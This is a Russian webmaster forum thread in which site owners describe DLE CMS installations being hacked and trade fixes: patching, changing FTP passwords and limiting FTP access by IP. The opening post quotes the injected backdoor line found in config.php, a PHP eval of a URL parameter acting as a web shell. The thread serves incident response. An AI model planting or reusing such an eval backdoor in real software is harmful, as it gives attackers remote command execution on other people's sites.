X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> dle Взлом сайта в config.php
vasyatko
vasyatko
Topic Starter сообщение 26.12.2010, 2:13; Ответить: vasyatko
Сообщение #1


Завсегдатай
*****


Группа: Active User
Сообщений: 871
Регистрация: 2.6.2008
Поблагодарили: 215 раз
Репутация:   49  


два сайта поломали на одном 8.0 версия на другом 8.2.  

Открылась белая страница.

Нашёл в config.php

'lang_123' => "",

'lang_1111111' => """",

'lang_123456' => "{${@eval($_GET[cmd])}}",




config.php изменяем права на файл и ставим заплатки




похожая тема.

http://talk.prowebber.ru/index.php?showtopic=3375


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
knaipa
knaipa
сообщение 26.12.2010, 13:14; Ответить: knaipa
Сообщение #2


мошенник
*****

Группа: Banned
Сообщений: 984
Регистрация: 15.6.2010
Поблагодарили: 280 раз
Репутация:   60  


Что нам теперь делать с этой информацией?


--------------------
Забанен за мошенничество
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
YuRec
YuRec
сообщение 26.12.2010, 13:20; Ответить: YuRec
Сообщение #3


Владеет миром тот, кто владеет информацией
*****

Группа: Active User
Сообщений: 558
Регистрация: 10.2.2010
Поблагодарили: 136 раз
Репутация:   24  


Вот на офф сайт описано как спастись.
_http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
casp
casp
сообщение 26.12.2010, 13:40; Ответить: casp
Сообщение #4


Завсегдатай
*****

Группа: Active User
Сообщений: 717
Регистрация: 7.11.2009
Из: 127.0.0.1
Поблагодарили: 158 раз
Репутация:   36  


Тоже самое! Очистил и нифига. Вирус всё равно грузиться. Что делать?
(заплатку поставил)

Сообщение отредактировал casp - 26.12.2010, 13:40
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
knaipa
knaipa
сообщение 26.12.2010, 13:43; Ответить: knaipa
Сообщение #5


мошенник
*****

Группа: Banned
Сообщений: 984
Регистрация: 15.6.2010
Поблагодарили: 280 раз
Репутация:   60  


Сменить пароль на фтп
Разрешить в .ftpaccess доступ только со своего айпишника.


--------------------
Забанен за мошенничество
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
YuRec
YuRec
сообщение 26.12.2010, 13:47; Ответить: YuRec
Сообщение #6


Владеет миром тот, кто владеет информацией
*****

Группа: Active User
Сообщений: 558
Регистрация: 10.2.2010
Поблагодарили: 136 раз
Репутация:   24  


Посмотри в шаблоне, может там какие-то непонятные скрипты добавили
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ukrseo
ukrseo
сообщение 26.12.2010, 13:47; Ответить: ukrseo
Сообщение #7


клоновод
**

Группа: Banned
Сообщений: 56
Регистрация: 29.3.2010
Поблагодарили: 20 раз
Репутация:   2  


На форуме уже тем 20 за неделю о взломах и о том что и где спрятано. Юзайте поиск уважаемый ТС.

Сообщение отредактировал ukrseo - 26.12.2010, 13:48


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 26.12.2010, 13:49; Ответить: install
Сообщение #8


Яндекс ЛОХ
*******


Группа: Active User
Сообщений: 3530
Регистрация: 28.5.2009
Из: Нижневартовска
Поблагодарили: 1376 раз
Репутация:   201  


(knaipa @ 26.12.2010, 14:43) *
Разрешить в .ftpaccess доступ

подробнее можно написать?

у меня ссылка с ундер-клик подгружается, каспер ее блочит, заплатки так же ставил


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
casp
casp
сообщение 26.12.2010, 13:53; Ответить: casp
Сообщение #9


Завсегдатай
*****

Группа: Active User
Сообщений: 717
Регистрация: 7.11.2009
Из: 127.0.0.1
Поблагодарили: 158 раз
Репутация:   36  


Во, install , у меня тоже самое. Каспер блочит какие то левые сайты под загрузку, права ставил, чистил эти lang_11111 всё равно!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
knaipa
knaipa
сообщение 26.12.2010, 13:57; Ответить: knaipa
Сообщение #10


мошенник
*****

Группа: Banned
Сообщений: 984
Регистрация: 15.6.2010
Поблагодарили: 280 раз
Репутация:   60  


95% всех взломов из-за того, что злоумышленник смог каким-то способом попасть через ftp на сервер и сделать нужное ему дело
поэтому кроме смены пароля нужно ещё и попробовать ограничить доступ по фтп
вот нагуглил немного

Настроек в этом файле может быть большое множество, однако для защиты, нас интересует только один параметр. Прописав эти строки в файле вы закроете полностью доступ от всех!

<Limit ALL>
Deny from all
</Limit>

После написанного выше, никто не сможет зайти на ФТП. Для добавления разрешения к определенному IP надо добавить строку вида

Allow from 127.0.0.1

перед Deny, например:

<Limit ALL>
Allow from 127.0.0.1
Deny from all
</Limit>

Естественно адрес 127.0.0.1 указан для примера. Нужно указать свой сетевой IP. Если же у вас динамический адрес, можно использовать фильтр вида:


ах да, это обычный текстовый файл, ложите его в корне хостинга.
вместо 127.0.0.1 указываете свой айпишник, узнать его можно к примеру тут http://ripe.net/ (справа вверху)


--------------------
Забанен за мошенничество
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Нужны услуги php-разработчика, бартером за дизайн
вы мне скрипт, я вам дизайн
0 Caterpillar 227 Вчера, 23:15
автор: Caterpillar
Открытая тема (нет новых ответов) Чем сжимать картинки для сайта без потери качества
1st-finstep.ru - Заработок в сети и методы продвижения сайта
16 komarik_vlad 1711 Вчера, 20:11
автор: komarik_vlad
Горячая тема (нет новых ответов) Услуги по CMS Wordpress, DLE, Joomla!. Правки, ремонт, настройка.
Редактирование и правки. Низкие цены.
143 contex1 65254 Вчера, 9:07
автор: contex1
Открытая тема (нет новых ответов) Нужен шаблон сайта. Джумла. игры
1 pix87 509 16.12.2017, 20:54
автор: Yepperoni
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыНе повлияет ли на позиции сайта?
Если убрать контент
12 maxg5 1337 14.12.2017, 21:11
автор: alexandrrr


 



RSS Текстовая версия Сейчас: 18.12.2017, 13:27
Дизайн